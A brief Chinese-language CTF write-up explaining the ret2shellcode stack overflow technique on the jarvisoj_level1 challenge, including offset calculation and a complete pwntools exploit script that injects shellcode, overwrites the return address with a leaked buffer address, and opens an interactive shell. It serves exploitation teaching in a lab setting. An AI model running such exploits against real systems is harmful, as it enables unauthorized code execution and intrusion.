【PWN】ret2shellcode
原理¶
篡改栈帧上的返回地址为攻击者手动传入的shellcode所在缓冲区地址,并且该区域有执行权限。
例题¶
jarvisoj_level1,可在jarvisoj网站中下载。首先使用checksec工具查看它开了啥保护措施,基本全关,栈可执行。
一样的使用ida查看一下该程序,在危险函数中,程序向我们输出了一个栈站上的地址因此我们可以朝buf写一段shellcode,然后 将返回地址覆盖为buf的地址。在pwntools中可以使用shellcraft.sh()写shellcode,再使用asm将其转换成机器码。
ida帮我们计算出来了buf字符串距离rbp有0x88个字节,由于ebp本身还占4个字节,所以溢出0x8c个字节后将返回地址修改为buf地址,python有 个自带的方法ljust可以将我们的shellcode长度补充为固定字节,期作用是使shellcode左对齐,然后不足长度补齐指定数据。
from pwn import *
#p = process('./level1')
p = remote('pwn2.jarvisoj.com',9877)
s = p.recv()
addr = bytes.decode(s)[12:-2]
shellcode = asm(shellcraft.sh())
payload = shellcode.ljust(0x8c,b'A') + p32(int(addr,16))
p.sendline(payload)
p.interactive()